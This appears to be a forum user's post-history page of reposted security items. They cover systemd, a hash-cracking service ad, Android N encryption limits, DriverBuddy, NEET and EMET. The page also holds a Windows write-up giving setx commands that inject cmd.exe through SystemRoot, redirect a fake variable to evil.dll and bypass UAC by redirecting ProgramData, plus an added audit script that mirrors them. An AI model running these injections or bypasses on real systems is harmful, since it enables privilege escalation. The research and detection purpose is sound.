Posts: 18794
Days Won: 742
Everything posted by Nytro
This would also be worth trying: https://github.com/MooseDojo/apt2
-
Understanding Systemd

Linux distributions are adopting or planning to adopt the systemd init system fast. systemd is a suite of system management daemons, libraries, and utilities designed as a central management and configuration platform for the Linux computer operating system. Described by its authors as a “basic building block” for an operating system, systemd primarily aims to replace the Linux init system (the first process executed in user space during the Linux startup process) inherited from UNIX System V and Berkeley Software Distribution (BSD). The name systemd adheres to the Unix convention of making daemons easier to distinguish by having the letter d as the last letter of the filename.

systemd is designed for Linux and programmed exclusively for the Linux API. It is published as free and open-source software under the terms of the GNU Lesser General Public License (LGPL) version 2.1 or later. The design of systemd generated significant controversy within the free software community, leading the critics to argue that systemd’s architecture violates the Unix philosophy and that it will eventually form a system of interlocking dependencies. However, as of 2015 most major Linux distributions have adopted it as their default init system.

Lennart Poettering and Kay Sievers, the software engineers who initially developed systemd, sought to surpass the efficiency of the init daemon in several ways. They wanted to improve the software framework for expressing dependencies, to allow more processing to be done concurrently or in parallel during system booting, and to reduce the computational overhead of the shell. Poettering describes systemd development as “never finished, never complete, but tracking progress of technology”.

In May 2014, Poettering further defined systemd as aiming to unify “pointless differences between distributions”, by providing the following three general functions:
– A system and service manager (manages both the system, as by applying various configurations, and its services)
– A software platform (serves as a basis for developing other software)
– The glue between applications and the kernel (provides various interfaces that expose functionalities provided by the kernel)

systemd is not just the name of the init daemon but also refers to the entire software bundle around it, which, in addition to the systemd init daemon, includes the daemons journald, logind and networkd, and many other low-level components. In January 2013, Poettering described systemd not as one program, but rather a large software suite that includes 69 individual binaries. As an integrated software suite, systemd replaces the startup sequences and runlevels controlled by the traditional init daemon, along with the shell scripts executed under its control. systemd also integrates many other services that are common on Linux systems by handling user logins, the system console, device hotplugging, scheduled execution (replacing cron), logging, hostnames and locales.

Like the init daemon, systemd is a daemon that manages other daemons, which, including systemd itself, are background processes. systemd is the first daemon to start during booting and the last daemon to terminate during shutdown. The systemd daemon serves as the root of the user space’s process tree; the first process (pid 1) has a special role on Unix systems, as it receives a SIGCHLD signal when a daemon process (which has detached from its parent) terminates. Therefore, the first process is particularly well suited for the purpose of monitoring daemons; systemd attempts to improve in that particular area over the traditional approach, which would usually not restart daemons automatically but only launch them once without further monitoring.

systemd executes elements of its startup sequence in parallel, which is faster than the traditional startup sequence’s sequential approach. For inter-process communication (IPC), systemd makes Unix domain sockets and D-Bus available to the running daemons. The state of systemd itself can also be preserved in a snapshot for future recall.

systemd records initialization instructions for each daemon in a configuration file (referred to as a “unit file”) that uses a declarative language, replacing the traditionally used per-daemon startup shell scripts. Unit file types include service, socket, device, mount, automount, swap, target, path, timer (which can be used as a cron-like job scheduler), snapshot, slice and scope.

Full article: https://n0where.net/understanding-systemd/
-
Forum | Hash Manager | Hash Finder | Hash Verifier

InsidePro Software offers professional and free solutions for recovering passwords to hashes!

Our Forum unites the world's best experts in hash and password recovery; its features:
– Devoted to recovering passwords to hashes of all types.
– Here you can always get help on recovering your passwords.
– Forum already contains over 200 thousand messages!

Hash Manager is a solution for recovering passwords to hashes; its features:
– Supports over 450 hashing algorithms.
– Contains over 70 additional utilities for handling hashes, passwords, and dictionaries.
– Optimized for working with large hash lists.
– Comes in a 64-bit version, which is much faster on many algorithms.
– Supports an unlimited number of loadable hashes, as well as dictionaries, rules, and masks.
– Supports all the most efficient hash attacks.
– Supports multithreading.
– Recovers passwords in Unicode.
– Has a modular architecture.
– And much more!

The Hash Finder service is designed for looking up hashes in a huge database; its features:
– Does not require registration.
– Supports over 100 hashing algorithms, including salted hashes.
– Supports hash list lookup.
– Contains only real hashes and passwords (over 1 billion records).
– Automatically detects the algorithm.
– For mixed lists, returns results on each algorithm separately.
– Accumulates found hashes in a queue, which is continuously being processed.
– Acquires new real hashes and passwords on a daily basis.
– The service has checked over 10 billion hashes!

The Hash Verifier service is designed for automatic verification of hashes and passwords; its features:
– Does not require registration.
– Supports all the most popular hashing algorithms.
– Supports hash list verification (up to 1000 lines).
– Stores links to successful verifications for a specified amount of time.
– Supports user names and salts in Hex format.
– The service has verified over 80 thousand paid hashes!

Source: http://www.insidepro.com/
-
Matthew Green in Uncategorized, November 24, 2016, 2,305 Words

The limitations of Android N Encryption

Over the past few years we’ve heard more about smartphone encryption than, quite frankly, most of us expected to hear in a lifetime. We learned that proper encryption can slow down even sophisticated decryption attempts if done correctly. We’ve also learned that incorrect implementations can undo most of that security. In other words, phone encryption is an area where details matter.

For the past few weeks I’ve been looking a bit at the details of Android Nougat’s new file-based encryption to see how well they’ve addressed some of those details in their latest release. The answer, unfortunately, is that there’s still lots of work to do. In this post I’m going to talk about a bit of that.

(As an aside: the inspiration for this post comes from Grugq, who has been loudly and angrily trying to work through these kinks to develop a secure Android phone. So credit where credit is due.)

Background: file and disk encryption

Disk encryption is much older than smartphones. Indeed, early encrypting filesystems date back at least to the early 1990s and proprietary implementations may go back before that. Even in the relatively new area of PC operating systems, disk encryption has been a built-in feature since the early 2000s.

The typical PC disk encryption system operates as follows. At boot time you enter a password. This is fed through a key derivation function to derive a cryptographic key. If a hardware co-processor is available (e.g., a TPM), your key is further strengthened by “tangling” it with some secrets stored in the hardware. This helps to lock encryption to a particular device. The actual encryption can be done in one of two different ways:

– Full Disk Encryption (FDE) systems (like Truecrypt, BitLocker and FileVault) encrypt disks at the level of disk sectors. This is an all-or-nothing approach, since the encryption drivers won’t necessarily have any idea what files those sectors represent. At the same time, FDE is popular — mainly because it’s extremely easy to implement.
– File-based Encryption (FBE) systems (like EncFS and eCryptFS) encrypt individual files. This approach requires changes to the filesystem itself, but has the benefit of allowing fine grained access controls where individual files are encrypted using different keys.

Most commercial PC disk encryption software has historically opted to use the full-disk encryption (FDE) approach. Mostly this is just a matter of expediency: FDE is just significantly easier to implement. But philosophically, it also reflects a particular view of what disk encryption was meant to accomplish. In this view, encryption is an all-or-nothing proposition. Your machine is either on or off; accessible or inaccessible. As long as you make sure to have your laptop stolen only when it’s off, disk encryption will keep you perfectly safe.

So what does this have to do with Android?

Android’s early attempts at adding encryption to their phones followed the standard PC full-disk encryption paradigm. Beginning in Android 4.4 (Kitkat) through Android 6.0 (Marshmallow), Android systems shipped with a kernel device mapper called dm-crypt designed to encrypt disks at the sector level. This represented a quick and dirty way to bring encryption to Android phones, and it made sense — if you believe that phones are just very tiny PCs.

The problem is that smartphones are not PCs. The major difference is that smartphone users are never encouraged to shut down their device. In practice this means that — after you enter a passcode once after boot — normal users spend their whole day walking around with all their cryptographic keys in RAM. Since phone batteries live for a day or more (a long time compared to laptops) encryption doesn’t really offer much to protect you against an attacker who gets their hands on your phone during this time.

Of course, users do lock their smartphones. In principle, a clever implementation could evict sensitive cryptographic keys from RAM when the device locks, then re-derive them the next time the user logs in. Unfortunately, Android doesn’t do this — for the very simple reason that Android users want their phones to actually work. Without cryptographic keys in RAM, an FDE system loses access to everything on the storage drive. In practice this turns it into a brick. For this very excellent reason, once you boot an Android FDE phone it will never evict its cryptographic keys from RAM. And this is not good.

So what’s the alternative?

Android is not the only game in town when it comes to phone encryption. Apple, for its part, also gave this problem a lot of thought and came to a subtly different solution. Starting with iOS 4, Apple included a “data protection” feature to encrypt all data stored on a device. But unlike Android, Apple doesn’t use the full-disk encryption paradigm. Instead, they employ a file-based encryption approach that individually encrypts each file on the device. In the Apple system, the contents of each file is encrypted under a unique per-file key (metadata is encrypted separately). The file key is in turn encrypted with one of several “class keys” that are derived from the user passcode and some hardware secrets embedded in the processor.

(Figure: iOS data encryption. Source: iOS Security Guide.)

The main advantage of the Apple approach is that instead of a single FDE key to rule them all, Apple can implement fine-grained access control for individual files. To enable this, iOS provides an API developers can use to specify which class key to use in encrypting any given file. The available “protection classes” include:

– Complete protection. Files encrypted with this class key can only be accessed when the device is powered up and unlocked. To ensure this, the class key is evicted from RAM a few seconds after the device locks.
– Protected Until First User Authentication. Files encrypted with this class key are protected until the user first logs in (after a reboot), and the key remains in memory.
– No protection. These files are accessible even when the device has been rebooted, and the user has not yet logged in.

By giving developers the option to individually protect different files, Apple made it possible to build applications that can work while the device is locked, while providing strong protection for files containing sensitive data. Apple even created a fourth option for apps that simply need to create new encrypted files when the class key has been evicted from RAM. This class uses public key encryption to write new files. This is why you can safely take pictures even when your device is locked.

Apple’s approach isn’t perfect. What it is, however, is the obvious result of a long and careful thought process. All of which raises the following question…

Why the hell didn’t Android do this as well?

The short answer is Android is trying to. Sort of. Let me explain.

As of Android 7.0 (Nougat), Google has moved away from full-disk encryption as the primary mechanism for protecting data at rest. If you set a passcode on your device, Android N systems can be configured to support a more Apple-like approach that uses file encryption. So far so good.

The new system is called Direct Boot, so named because it addresses what Google obviously saw as a fatal problem with Android FDE — namely, that FDE-protected phones are useless bricks following a reboot. The main advantage of the new model is that it allows phones to access some data even before you enter the passcode. This is enabled by providing developers with two separate “encryption contexts”:

– Credential encrypted storage. Files in this area are encrypted under the user’s passcode, and won’t be available until the user enters their passcode (once).
– Device encrypted storage. These files are not encrypted under the user’s passcode (though they may be encrypted using hardware secrets). Thus they are available after boot, even before the user enters a passcode.

Direct Boot even provides separate encryption contexts for different users on the phone — something I’m not quite sure what to do with. But sure, why not?

If Android is making all these changes, what’s the problem?

One thing you might have noticed is that where Apple had four categories of protection, Android N only has two. And it’s the two missing categories that cause the problems. These are the “complete protection” categories that allow the user to lock their device following first user authentication — and evict the keys from memory.

Of course, you might argue that Android could provide this by forcing application developers to switch back to “device encrypted storage” following a device lock. The problem with this idea is twofold. First, Android documentation and sample code is explicit that this isn’t how things work:

Moreover, a quick read of the documentation shows that even if you wanted to, there is no unambiguous way for Android to tell applications when the system has been re-locked. If keys are evicted when the device is locked, applications will unexpectedly find their file accesses returning errors. Even system applications tend to do badly when this happens.

And of course, this assumes that Android N will even try to evict keys when you lock the device. Here’s how the current filesystem encryption code handles locks:

While the above is bad, it’s important to stress that the real problem here is not really in the cryptography. The problem is that since Google is not giving developers proper guidance, the company may be locking Android into years of insecurity.

Without (even a half-baked) solution to define a “complete” protection class, Android app developers can’t build their apps correctly to support the idea that devices can lock. Even if Android O gets around to implementing key eviction, the existing legacy app base won’t be able to handle it — since this will break a million apps that have implemented their security according to Android’s current recommendations. In short: this is a thing you get right from the start, or you don’t do at all. It looks like — for the moment — Android isn’t getting it right.

Are keys that easy to steal?

Of course it’s reasonable to ask whether having keys in RAM is that big of a concern in the first place. Can these keys actually be accessed? The answer to that question is a bit complicated.

First, if you’re up against somebody with a hardware lab and forensic expertise, the answer is almost certainly “yes”. Once you’ve entered your passcode and derived the keys, they aren’t stored in some magically secure part of the phone. People with the ability to access RAM or the bus lines of the device can potentially nick them. But that’s a lot of work.

From a software perspective, it’s even worse. A software attack would require a way to get past the phone’s lockscreen in order to get running code on the device. In older (pre-N) versions of Android the attacker might need to then escalate privileges to get access to Kernel memory. Remarkably, Android N doesn’t even store its disk keys in the Kernel — instead they’re held by the “vold” daemon, which runs as user “root” in userspace. This doesn’t make exploits trivial, but it certainly isn’t the best way to handle things.

Of course, all of this is mostly irrelevant. The main point is that if the keys are loaded you don’t need to steal them. If you have a way to get past the lockscreen, you can just access files on the disk.

What about hardware?

Although a bit of a tangent, it’s worth noting that many high-end Android phones use some sort of trusted hardware to enable encryption. The most common approach is to use a trusted execution environment (TEE) running with ARM TrustZone. This definitely solves a problem. Unfortunately it’s not quite the same problem as discussed above.

ARM TrustZone — when it works correctly, which is not guaranteed — forces attackers to derive their encryption keys on the device itself, which should make offline dictionary attacks on the password much harder. In some cases, this hardware can be used to cache the keys and reveal them only when you input a biometric such as a fingerprint.

The problem here is that in Android N, this only helps you at the time the keys are being initially derived. Once that happens (i.e., following your first login), the hardware doesn’t appear to do much. The resulting derived keys seem to live forever in normal userspace RAM. While it’s possible that specific phones (e.g., Google’s Pixel, or Samsung devices) implement additional countermeasures, on stock Android N phones hardware doesn’t save you.

So what does it all mean?

How you feel about this depends on whether you’re a “glass half full” or “glass half empty” kind of person.

If you’re an optimistic type, you’ll point out that Android is clearly moving in the right direction. And while there’s a lot of work still to be done, even a half-baked implementation of file-based encryption is better than the last generation of dumb FDE Android encryption. Also: you probably also think clowns are nice.

On the other hand, you might notice that this is a pretty goddamn low standard. In other words, in 2016 Android is still struggling to deploy encryption that achieves (lock screen) security that Apple figured out six years ago. And they’re not even getting it right. That doesn’t bode well for the long term security of Android users.

And that’s a shame, because as many have pointed out, the users who rely on Android phones are disproportionately poorer and more at-risk. By treating encryption as a relatively low priority, Google is basically telling these people that they shouldn’t get the same protections as other users. This may keep the FBI off Google’s backs, but in the long term it’s bad judgement on Google’s part.

Source: https://blog.cryptographyengineering.com/2016/11/24/android-n-encryption/
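A runnable model of the class-key design the post describes (per-file key wrapped under a class key, class keys held in RAM only while the device state allows), added here as an example and not Apple's or Android's code. The cipher is a toy HMAC-SHA256 keystream standing in for the real block cipher, the hardware secret is a random value, and Apple's fourth public-key class is not modelled; Android N's two contexts correspond to the AFTER_FIRST_UNLOCK and NONE classes, and the missing COMPLETE class is the one whose eviction makes reads fail after a lock.

```python
import hashlib
import hmac
import os
from enum import Enum


class ProtectionClass(Enum):
    COMPLETE = "complete"                      # class key evicted from RAM on lock
    AFTER_FIRST_UNLOCK = "after_first_unlock"  # key stays in RAM after first login
    NONE = "none"                              # derived from the hardware secret only


def _keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Toy stream cipher: XOR data with HMAC-SHA256(key, nonce || counter) blocks.
    Stands in for AES; it is NOT authenticated and only models key usage."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


class Device:
    """Per-file encryption: each file key is wrapped by a class key, and class keys
    live in RAM only while the device state permits (the rule the classes encode)."""

    def __init__(self, passcode: str):
        self.hw_secret = os.urandom(32)          # stands in for the SoC-embedded secret
        # Passcode verifier kept on flash: a hash of the derived root key.
        self._verifier = hashlib.sha256(self._root_key(passcode)).digest()
        self.files = {}   # name -> (class, nonce, wrapped_file_key, ciphertext)
        self._class_keys = {}                    # what is currently held in RAM
        self.boot()

    def _root_key(self, passcode: str) -> bytes:
        # Passcode "tangled" with the hardware secret, as the post describes.
        return hashlib.pbkdf2_hmac("sha256", passcode.encode(), self.hw_secret, 20_000)

    def boot(self) -> None:
        """After a reboot only the NONE class is usable (device-encrypted storage)."""
        self.locked = True
        self._class_keys = {
            ProtectionClass.NONE: hmac.new(self.hw_secret, b"class:none", hashlib.sha256).digest()
        }

    def unlock(self, passcode: str) -> None:
        root = self._root_key(passcode)
        if not hmac.compare_digest(hashlib.sha256(root).digest(), self._verifier):
            raise ValueError("wrong passcode")
        for pc in (ProtectionClass.COMPLETE, ProtectionClass.AFTER_FIRST_UNLOCK):
            self._class_keys[pc] = hmac.new(root, b"class:" + pc.value.encode(),
                                            hashlib.sha256).digest()
        self.locked = False

    def lock(self) -> None:
        """Evict only the COMPLETE key; AFTER_FIRST_UNLOCK stays (credential-encrypted storage)."""
        self.locked = True
        self._class_keys.pop(ProtectionClass.COMPLETE, None)

    def keys_in_ram(self) -> set:
        return {pc.value for pc in self._class_keys}

    def _class_key(self, pc: ProtectionClass) -> bytes:
        try:
            return self._class_keys[pc]
        except KeyError:
            # The "file accesses returning errors" failure mode the post warns about.
            raise PermissionError(f"class key {pc.value!r} is not in RAM") from None

    def write_file(self, name: str, pc: ProtectionClass, data: bytes) -> None:
        class_key = self._class_key(pc)
        file_key, nonce = os.urandom(32), os.urandom(16)
        wrapped = _keystream_xor(class_key, b"wrap" + nonce, file_key)  # file key under class key
        self.files[name] = (pc, nonce, wrapped, _keystream_xor(file_key, nonce, data))

    def read_file(self, name: str) -> bytes:
        pc, nonce, wrapped, ciphertext = self.files[name]
        file_key = _keystream_xor(self._class_key(pc), b"wrap" + nonce, wrapped)
        return _keystream_xor(file_key, nonce, ciphertext)
```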
-
Command Injection/Elevation – Environment Variables Revisited
Yotam Gottesman, November 24, 2016

Windows environment variables can be used to run commands and can also be used to bypass UAC, allowing an attacker with limited privileges to take complete control of the system. This code leverages a rather unusual scenario within Windows OS. This is a continuation of our research as described in a previous post: Elastic Boundaries on BreakingMalware.com

Background and Research Basis

In the last post on this topic, we demonstrated that changing a location referred to by environment variables can divert file operations from a legitimate path to a possibly malicious one. Looking through the registry suggests different scenarios and possibilities that exist for environment variable expansion (ab)use. Let’s continue from where we left off last time.

Scenario 6: Command Injection

Assumption: If a command contains an environment variable, it can be expanded into multiple executable commands.
Possibility: An attacker can set up commands that will be executed when a different, unrelated file is opened or otherwise accessed.
Application: A regular text file (.txt) opens with notepad.exe. The command to open such a file is:
%SystemRoot%\System32\NOTEPAD.EXE %1
Effectively running this command:
C:\Windows\System32\NOTEPAD.EXE <filename.txt>
Now, by using this command:
setx SystemRoot "C:\Windows\System32\cmd.exe && C:\Windows"
The resulting line changes to:
C:\Windows\System32\cmd.exe && C:\Windows\System32\NOTEPAD.EXE <filename.txt>
Which means opening a command window before Notepad is called. “&&” means Notepad will run after the command exits, if it succeeds. There are other operators that could be used here instead.

(Figure: A command string, containing environment variables)

Scenario 7: Parameter Manipulation

The Windows registry contains commands that parse and expand a string that contains multiple percent signs (‘%’).

(Figure: A parameter string, vulnerable to fake variable expansion)

Assumption: Anything between two percent signs is considered an environment variable and could be expanded as one.
Possibility: An attacker can set an environment variable-like string to be expanded by Windows, manipulating command parameters.
Application: Setting an environment variable named 1", and pointing it to any dll file. Quote symbols must be escaped.
setx "1\"," "C:\Temp\evil.dll\","
Result: Running any .cpl file on the system will run evil.dll instead.

Scenario 8: Elevation using environment variables expansion. Again.

Right-clicking “My Computer” (or “This PC”, on Windows 10) and choosing “Manage” from the context menu causes the “Computer Management” console to open with elevated privileges and without showing the UAC prompt. Behind the scenes, this behavior is defined by the verb “Manage” of the computer item’s class, as can be seen in the registry at this path:
HKCR\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage\command
The value for this key is:
%SystemRoot%\system32\CompMgmtLauncher.exe

Assumption: CompMgmtLauncher.exe runs with elevated privileges.
Possibility: An attacker can take control of this command by setting SystemRoot and gain elevated privileges.
Result: Failure. Our assumption is incorrect at this point. Changing the path did cause a different executable to launch instead of CompMgmtLauncher.exe, but it was running with medium integrity (i.e., not elevated).
Further Research: So, what does CompMgmtLauncher.exe do to achieve elevated status?

The Anomaly: CompMgmtLauncher.exe actually runs another link in the chain – a .lnk file, found in the Start Menu’s Administrative Tools folder:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk
This link file points to the already familiar mmc.exe in Windows\System32, giving it an argument in the form of a .msc file, specifically compmgmt.msc. It appears that running mmc.exe by itself shows the UAC prompt, but running it with some specific .msc files does not.

Assumption: CompMgmtLauncher.exe runs the file that the .lnk file points to with elevated privileges.
Possibility: An attacker can control the target of the .lnk file and bypass UAC.
Result: Failure. Not quite there yet. Writing to the directory and over the .lnk file requires high integrity to begin with.
Further Research: The folder of interest is referenced by two environment variables:
ALLUSERSPROFILE=C:\ProgramData
ProgramData=C:\ProgramData

Assumption: CompMgmtLauncher.exe uses one of these variables to access the .lnk file.
Possibility: An attacker can change one or both of the mentioned environment variables and gain control over the called .lnk file.
Application:
– Set ProgramData to point to a directory other than C:\ProgramData
– Create the correct directory tree: Microsoft\Windows\Start Menu\Programs\Administrative Tools
– Create a link (.lnk) that points to a string containing a command
– Call “Manage” on “My Computer”/“This PC”, or run CompMgmtLauncher.exe
Result: Success.

(Figure: Elevated command window using CompMgmtLauncher)

Conclusion and Thoughts

The methods described here are not surprising news given previous findings. They also rely on an attacker having some access to the machine and possessing some privileges to initiate an attack. Nevertheless, environment variables can aid attackers in compromising a system and they provide some meaningful additions to their toolset.

The images in the post are taken from a machine running Windows 7 32-bit. The methods have been tested on Windows 7 and Windows 10, both 32 and 64 bit versions and require no adjustments. There is still a lot more research to be conducted on the matter, on Windows and other operating systems.

https://github.com/BreakingMalwareResearch/eleven

Source: https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited/
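The three scenarios share one detectable footprint: a user-scope (HKCU\Environment) definition that shadows a system variable such as SystemRoot or ProgramData, a value carrying cmd.exe separators, or a variable name that only makes sense as a fake %...% token. The audit below is an added example for defenders, not BreakingMalware's code; the SYSTEM_ENV and USER_ENV dictionaries are constructed to look like a host after the commands above were run, and load_from_registry() is the Windows-only reader that would replace them.

```python
import re

# Variables that shell verbs and registry commands expand into executable paths.
CRITICAL = {"SYSTEMROOT", "WINDIR", "SYSTEMDRIVE", "COMSPEC", "PROGRAMDATA",
            "ALLUSERSPROFILE", "PROGRAMFILES", "PROGRAMFILES(X86)", "PATH"}
# cmd.exe operators that turn one expanded command into several (Scenario 6).
SEPARATORS = ("&&", "||", "|", "&")
# Legitimate names: letters, digits, underscore, parentheses (e.g. ProgramFiles(x86)).
NAME_OK = re.compile(r"^[A-Za-z_][A-Za-z0-9_()]*$")

# Constructed sample of HKLM\...\Session Manager\Environment and HKCU\Environment.
SYSTEM_ENV = {
    "SystemRoot": r"C:\Windows",
    "ProgramData": r"C:\ProgramData",
    "ComSpec": r"C:\Windows\system32\cmd.exe",
    "Path": r"C:\Windows\system32;C:\Windows",
}
USER_ENV = {
    "TEMP": r"C:\Users\alice\AppData\Local\Temp",                 # benign
    "SystemRoot": r"C:\Windows\System32\cmd.exe && C:\Windows",  # Scenario 6 shape
    "ProgramData": r"C:\Users\alice\staging",                     # Scenario 8 shape
    '1",': r'C:\Users\alice\loader.dll",',                        # Scenario 7 shape
}


def audit_environment(system_env, user_env):
    """Return (severity, message) findings; an empty list means nothing suspicious."""
    findings = []
    system_upper = {k.upper(): v for k, v in system_env.items()}
    for name, value in user_env.items():
        if not NAME_OK.match(name):
            findings.append(("high", f"malformed variable name {name!r}: "
                             "can be matched by a %...% token inside a registry command"))
        if name.upper() in CRITICAL:
            findings.append(("high", f"user-scope override of {name}: "
                             f"system={system_upper.get(name.upper())!r} user={value!r}"))
    for scope, env in (("system", system_env), ("user", user_env)):
        for name, value in env.items():
            if any(sep in value for sep in SEPARATORS) or '"' in value:
                findings.append(("high", f"{scope} variable {name!r} carries a command "
                                 f"separator or quote: {value!r}"))
    return findings


def load_from_registry():
    """Read the live definitions on a Windows host (not exercised offline)."""
    import winreg  # Windows-only module

    def dump(root, path):
        out, i = {}, 0
        with winreg.OpenKey(root, path) as key:
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, i)
                except OSError:          # no more values under this key
                    return out
                out[name] = str(value)
                i += 1

    return (dump(winreg.HKEY_LOCAL_MACHINE,
                 r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment"),
            dump(winreg.HKEY_CURRENT_USER, r"Environment"))


if __name__ == "__main__":
    for severity, message in audit_environment(SYSTEM_ENV, USER_ENV):
        print(f"[{severity}] {message}")
```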
-
Quickstart

DriverBuddy Installation Instructions
– Copy the DriverBuddy folder and the DriverBuddy.py file into the IDA plugins folder, C:\Program Files (x86)\IDA 6.8\plugins or wherever you installed IDA

DriverBuddy Usage Instructions
– Start IDA and open a Windows kernel driver
– Go to Edit->Plugins and select Driver Buddy, or press ctrl-alt-d
– Check the Output window for DriverBuddy analysis results
– To decode IOCTLs, highlight the suspected IOCTL and press ctrl-alt-i

DriverBuddy

DriverBuddy is an IDAPython plugin that helps automate some of the tedium surrounding the reverse engineering of Windows Kernel Drivers. It has a number of handy features, such as:
– Identifying the type of driver
– Locating DispatchDeviceControl and DispatchInternalDeviceControl functions
– Populating common structs for WDF and WDM drivers
– Attempting to identify and label structs like the IRP and IO_STACK_LOCATION
– Labeling calls to WDF functions that would normally be unlabeled
– Finding known IOCTL codes and decoding them
– Flagging functions prone to misuse

Link: https://github.com/nccgroup/DriverBuddy
-
NEET - Network Enumeration and Exploitation Tool

Neet is a flexible, multi-threaded tool for network penetration testing. It runs on Linux and co-ordinates the use of numerous other open-source network tools, with the aim of gathering as much network information as possible in clear, easy-to-use formats. The core scanning engine finds and identifies network services, the modules test or enumerate those services, and the Neet Shell provides an integrated environment for processing the results and exploiting known vulnerabilities. As such, it sits somewhere between manually running your own port scans and subsequent tests, and running a fully automated vulnerability assessment (VA) tool. It has many options which allow the user to tune the test parameters for network scanning in the most efficient and practical way.

Neet is aimed at professional penetration testers, internal IT security teams and network administrators who wish to know more about what's actually on their network infrastructure. You might want to try it out if you fall into one of those categories. It has been written (and continues to be developed) by a professional penetration tester over years of engagements, and has been designed explicitly to do the leg-work for you and to make it convenient and safe to get your hands on useful network information before the customer brings your first cup of tea of the day.

Link: https://github.com/JonnyHightower/neet
-
Windows 10 Cannot Protect Insecure Applications Like EMET Can POSTED ON NOVEMBER 21, 2016 BY WILL DORMANN IN VULNERABILITY MITIGATION Recently, Microsoft published a blog post called Moving Beyond EMET that appears to make two main points: (1) Microsoft will no longer support EMET after July 31, 2018, and (2) Windows 10 provides protections that make EMET unnecessary. In this blog post, I explain why Windows 10 does not provide the additional protections that EMET does and why EMET is still an important tool to help prevent exploitation of vulnerabilities. EMET Protections and How They Are Applied To compare protections of a Windows-with-EMET system against a stock Windows 10 system, it's important to first enumerate the protections that EMET 5.51 provides: System-Wide Protection Data Execution Prevention (DEP) Structured Exception Handler Overwrite Protection (SEHOP) Address Space Layout Randomization (ASLR) Certificate Trust (Pinning) Block Untrusted Fonts (Fonts) The system-wide DEP, SEHOP, and ASLR settings in EMET are provided by the Windows operating system itself. That is, the benefit of EMET for these settings is simply that it acts as a unified GUI application to make these changes in your system. Application-Specific Protection Data Execution Prevention (DEP) Structured Exception Handler Overwrite Protection (SEHOP) Null Page Allocation (NullPage) Heapspray Allocations (HeapSpray) Export Address Table Access Filtering (EAF) Export Address Table Access Filtering Plus (EAF+) Mandatory Address Space Layout Randomization (ASLR) Bottom-Up Randomization (BottomUpASLR) ROP Mitigations LoadLib MemProt Caller SimExecFlow StackPivot Attack Surface Reduction (ASR) Block Untrusted Fonts (Fonts) Application-specific EMET mitigations are applied by loading the EMET library into the process space of each protected application when it is launched. Here, the EMET library can modify the behavior of the target application by providing additional protections. 
The application-specific-protection capability provided by EMET is where EMET really adds value. Because we cannot rely on all software vendors to produce code that uses all of the exploit mitigations available, EMET puts this control back in our hands. Detailed descriptions of these protections can be found in the EMET 5.5 User's Guide. Visualizing Protections With and Without EMET To help visualize what EMET can do for us, it is useful to enumerate the exploit mitigations for various Windows versions, both with and without EMET. When it comes to system-wide mitigations, there's not much of a difference between a Windows system that has EMET installed and a stock Windows system that has had the mitigations enabled manually. This comparison, illustrated in the figure below, makes the true benefit of EMET clear: application-specific mitigations. It is pretty clear that an application running on a stock Windows 10 system does not have the same protections as one running on a Windows 10 system with EMET properly configured. Even a Windows 7 system with EMET configured protects your application more than a stock Windows 10 system. Analyzing Microsoft's Statement The Microsoft Blog entry Moving Beyond EMET makes the following statement: Windows 10 includes all of the mitigation features that EMET administrators have come to rely on such as DEP, ASLR, and Control Flow Guard (CFG) along with many new mitigations to prevent bypasses in UAC and exploits targeting the browser. Let's look at the language used and analyze what Microsoft is actually saying and how people may interpret the sentence. Fact: Windows 10 supports DEP, ASLR, and Control Flow Guard (CFG). Fiction: Windows 10 makes EMET irrelevant. In Defense of EMET Microsoft's statement above overlooks the primary reason for someone to run EMET. In particular, users running EMET to protect applications that do not opt in to all of the exploit mitigations that it should. 
Even though the underlying Windows operating system supports a mitigation, that does not necessarily mean that it will be applied to an application. Developer adoption of exploit mitigations takes place at a slower rate than we'd like to see. For example, even Microsoft does not compile all of Office 2010 with the /DYNAMICBASE flag to indicate compatibility with ASLR.

What is the impact? An attacker may be able to work around ASLR by causing a non-DYNAMICBASE library to be loaded into the process space of the vulnerable application, potentially resulting in successful exploitation of a memory corruption vulnerability.

What do we do to protect ourselves against this situation? We run EMET with application-specific mitigations enabled!

The Windows 10 EMET Fallacy

Microsoft strongly implies that if you are running Windows 10, there is no need for EMET anymore. This implication is not true. The reason it's not true is that Windows 10 does not provide the application-specific mitigations that EMET does.

Windows 10 does indeed provide some nice exploit mitigations. The problem is that the software that you are running needs to be specifically compiled to take advantage of them.

Control Flow Guard (CFG) looks to provide similar protections to the ROP application-specific mitigations in EMET. The problem is that the application needs to be specifically compiled to take advantage of CFG. Out of all of the applications you run in your enterprise, do you know which ones are built with CFG support? If an application is not built to use CFG, it doesn't matter if your underlying operating system supports CFG or not.

Update (November 21, 2016)

Windows 10, version 1607 and Windows Server 2016 do support some application-specific mitigations, in particular DEP, SEHOP, ASLR, and BottomupASLR. The table above has been updated to reflect this information.
Setting these application-specific mitigations requires calculating and setting a bit field value in the Windows registry for each process name that you would like to protect. Please see "Override Process Mitigation Options to help enforce app-related security policies" for more details.

EMET and Its End of Life

Microsoft has announced that they will no longer support EMET beyond July 31, 2018. Some may use this end-of-life (EOL) statement as an excuse for not deploying EMET. If this is the case, it would be wise to investigate all of the software that is currently outside of the support window before July 31, 2018. If you are lucky enough that all of your applications are within their support cycle, EMET provides protections against exploitation of new and unknown memory-corruption vulnerabilities, known as "zero-days."

Microsoft applications that will lose support a year before EMET are listed in Products Reaching End of Support for 2017. Office 2007 is in this list, for example. With such out-of-support applications, it is even more important to provide additional exploit protection with a product like EMET. When a vulnerability is discovered in a product outside of its support cycle, this vulnerability is referred to as a "forever-day." That is, the vulnerability will never be fixed.

Just because Microsoft will stop supporting EMET after July 31, 2018 does not mean that the application will stop working beyond that date. It will likely continue to operate in the same way that it has been working all along. This EOL date simply means that you will not be able to get assistance from Microsoft after that date.

Mitigations Without EMET

As mentioned earlier, many of the system-wide mitigations exposed by EMET are actually provided by the underlying Windows operating system. The primary mitigations that can be enabled globally are DEP and ASLR.

DEP

System-wide DEP can be configured using the BCDEdit utility.
